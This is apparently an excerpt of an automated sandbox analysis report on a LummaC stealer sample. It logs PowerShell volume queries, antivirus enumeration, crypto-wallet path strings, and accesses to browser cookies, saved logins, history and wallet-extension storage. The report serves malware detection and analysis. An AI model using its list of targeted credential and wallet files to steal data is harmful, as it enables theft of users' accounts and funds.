                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290373903.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287056981.0000000003943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: ghhqoznpon_638708802577261661.exe PID: 6396, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361810684.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wal
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361810684.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361810684.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: int.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d"
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361810684.000000000074C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":h
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266235038.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: a%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152t
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238402687.000000000394F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266235038.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266235038.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266235038.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
